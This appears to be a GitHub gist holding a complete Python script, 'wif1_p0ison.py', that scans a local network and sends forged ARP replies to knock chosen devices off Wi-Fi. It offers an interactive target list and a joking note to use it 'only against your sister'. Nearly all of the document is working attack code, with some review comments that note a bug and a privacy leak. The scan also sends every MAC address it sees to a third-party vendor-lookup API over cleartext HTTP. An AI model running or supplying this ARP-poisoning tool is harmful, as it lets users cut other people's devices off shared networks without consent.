Last active
March 15, 2020 02:12
Kick off a device from wifi --- Use it only against your sister
#!/usr/bin/env python
import os
import socket
import time

import requests
from scapy.all import *
# Placeholder MAC address that poison() advertises as the gateway's hardware
# address; restore() replaces it with the gateway MAC learned by scan_lan().
DEFAULT_BAD_GATEWAY = '12:34:56:78:9A:BC'
class Device(object):
    """A host seen during a LAN scan: IP address, MAC address and vendor label."""

    def __init__(self, ip, mac, vendor):
        """Store the three identifying fields exactly as given."""
        self.ip, self.mac, self.vendor = ip, mac, vendor

    def __str__(self):
        """Return the fields as one space-separated line: ip, mac, vendor."""
        fields = (self.ip, self.mac, self.vendor)
        return "%s %s %s" % fields
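def scan_lan():
    """Discover hosts on the local network via ARP and label each with a vendor.

    The scan range is the local address with its last octet replaced by ``*``,
    so only that /24-sized range is covered.

    Returns:
        A ``(gateway_ip, gateway_mac, devices)`` tuple. ``gateway_ip`` is a
        guess (the ``.1`` address of the local prefix), ``gateway_mac`` is
        ``None`` when that address did not answer the ARP scan, and
        ``devices`` is a list of ``Device`` objects.
    """
    # Learn the local address from the route toward the internet. This needs
    # working name resolution, so it fails without an internet connection.
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.connect(("google.com", 80))
        lan_ip = probe.getsockname()[0]
    finally:
        # Release the descriptor even when connect() raises.
        probe.close()

    prefix = lan_ip[:lan_ip.rfind(".") + 1]
    lan_range = prefix + "*"  # e.g. 192.168.1.*
    # The gateway is assumed to sit at .1; on networks where it does not,
    # gateway_mac stays None or belongs to an unrelated host.
    gateway_ip = prefix + "1"
    gateway_mac = None

    answers, _ = arping(lan_range, verbose=0)
    scan_result = []
    for answer in answers:
        mac = answer[1].hwsrc
        ip = answer[1].psrc
        if ip == gateway_ip:
            gateway_mac = mac
        # NOTE(review): this sends every MAC address seen on the LAN to a
        # third-party service over cleartext HTTP. Treat that as a privacy
        # leak; an offline OUI table would avoid it.
        try:
            # Bounded wait so one unresponsive lookup cannot hang the scan.
            r = requests.get('http://macvendors.co/api/%s' % mac, timeout=5)
            vendor = str(r.json()["result"]["company"])
        except Exception:
            # Lookup is best effort; Exception (not a bare except) lets
            # CTRL+C and SystemExit propagate instead of being swallowed.
            vendor = "<vendor not found>"
        scan_result.append(Device(ip, mac, vendor))
    return gateway_ip, gateway_mac, scan_result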
def poison(device, gateway_ip):
    """Send one forged ARP reply mapping the gateway IP to a wrong MAC.

    The reply (op=2) is addressed to ``device`` and claims that
    ``gateway_ip`` lives at ``DEFAULT_BAD_GATEWAY``.

    Defender's view: a gateway IP that suddenly resolves to a different MAC
    is the signal that ARP monitoring and switch-level dynamic ARP
    inspection are meant to catch.
    """
    forged_reply = ARP(
        op=2,
        psrc=gateway_ip,
        hwsrc=DEFAULT_BAD_GATEWAY,
        pdst=device.ip,
        hwdst=device.mac,
    )
    send(forged_reply, verbose=0)
def restore(device, gateway_ip, gateway_mac):
    """Send one ARP reply mapping the gateway IP back to its correct MAC.

    Same packet shape as poison(), but ``hwsrc`` carries the real
    ``gateway_mac``. Only a single packet is sent.
    """
    corrective_reply = ARP(
        op=2,
        psrc=gateway_ip,
        hwsrc=gateway_mac,
        pdst=device.ip,
        hwdst=device.mac,
    )
    send(corrective_reply, verbose=0)
def banner():
    """Print the tool header and the list of shell commands."""
    help_lines = (
        " ]===== wif1_p0ison.py =====[",
        " ]====== by malweisse ======[",
        " [ commands ]",
        " scan :: scan the lan for devices",
        " devices :: print prevous scanned devices",
        " add <idx> :: add devices[idx] to the to-block list",
        " add all :: add all scanned devices to the to-block list",
        " remove <idx> :: remove to-block[idx] from the to-block list",
        " remove all :: clean the to-block list",
        " list :: print the to-block list",
        # Not offered by the shell, so it stays out of the help text:
        # " restore <idx> :: reset device[idx] with correct gateway",
        " run :: poison all devices in the to-block list",
        " quit :: quit shell",
    )
    for line in help_lines:
        print(line)
def shell():
    """Run the interactive command loop.

    State kept across commands: the gateway IP/MAC and device list from the
    last ``scan``, and ``block_list``, the Device objects selected for
    poisoning. The loop ends only through the ``quit`` command.
    """
    gateway_ip = None
    gateway_mac = None
    devices = []
    block_list = []
    while True:
        cmd = raw_input(":> ")
        cmd = cmd.split()
        # Empty input: just prompt again.
        if len(cmd) == 0:
            continue
        if cmd[0] == "scan":
            print " >> scanning lan..."
            gateway_ip, gateway_mac, devices = scan_lan()
            for i in xrange(len(devices)):
                print " (id: %d) " % i, devices[i]
            print " >> scan completed"
            # Without the gateway MAC, restore() cannot be called later.
            if gateway_mac == None:
                print " >> WARNING! gateway not found so i can't restore normal wifi behaviour after poisoning!"
                print " >> quit if you don't know what are you doing."
        elif cmd[0] == "devices":
            print " >> scanned devices"
            for i in xrange(len(devices)):
                print " (id: %d) " % i, devices[i]
        elif cmd[0] == "add":
            if len(cmd) == 1:
                print " >> invalid idx"
                continue
            if cmd[1] == "all":
                # NOTE(review): the loop variable is `i` but the index used is
                # `dev_id`, which is only assigned in the numeric add/remove
                # paths below; this raises NameError if neither ran before.
                for i in xrange(len(devices)):
                    block_list.append(devices[dev_id])
                continue
            try:
                dev_id = int(cmd[1])
            except:
                print " >> invalid idx"
                continue
            if dev_id < 0 or dev_id >= len(devices):
                print " >> invalid idx"
                continue
            block_list.append(devices[dev_id])
        elif cmd[0] == "remove":
            if len(cmd) == 1:
                print " >> invalid idx"
                continue
            if cmd[1] == "all":
                block_list = []
                continue
            try:
                dev_id = int(cmd[1])
            except:
                print " >> invalid idx"
                continue
            # Here the index refers to block_list, not to the scan results.
            if dev_id < 0 or dev_id >= len(block_list):
                print " >> invalid idx"
                continue
            block_list.pop(dev_id)
        elif cmd[0] == "list":
            print " >> to-block list"
            for i in xrange(len(block_list)):
                print " (id: %d) " % i, block_list[i]
        elif cmd[0] == "run":
            print " >> poisoning..."
            print " >> press CTRL+C to stop"
            # NOTE(review): nothing checks that `scan` ran first, so
            # gateway_ip may still be None here. The loop also has no pause
            # between rounds (`time` is imported but never used), so it
            # transmits continuously until interrupted.
            while True:
                try:
                    for victim in block_list:
                        poison(victim, gateway_ip)
                except KeyboardInterrupt:
                    if gateway_mac == None:
                        # Listed devices are left with the wrong mapping.
                        print " >> unable to restore without the gateway mac"
                    else:
                        print " >> restoring..."
                        # One corrective reply per device; presumably a lost
                        # packet leaves that device disconnected until its
                        # ARP entry is refreshed -- TODO confirm.
                        for victim in block_list:
                            restore(victim, gateway_ip, gateway_mac)
                        print ' >> done'
                    break
        elif cmd[0] == "quit":
            exit(0)
        else:
            print " >> invalid command"
def main():
    """Check for root privileges, then show the banner and start the shell."""
    running_as_root = os.geteuid() == 0
    if not running_as_root:
        print(" >> please use the root user")
        exit(1)
    banner()
    shell()
# Start the interactive tool only when run as a script, not when imported.
if __name__ == "__main__":
    main()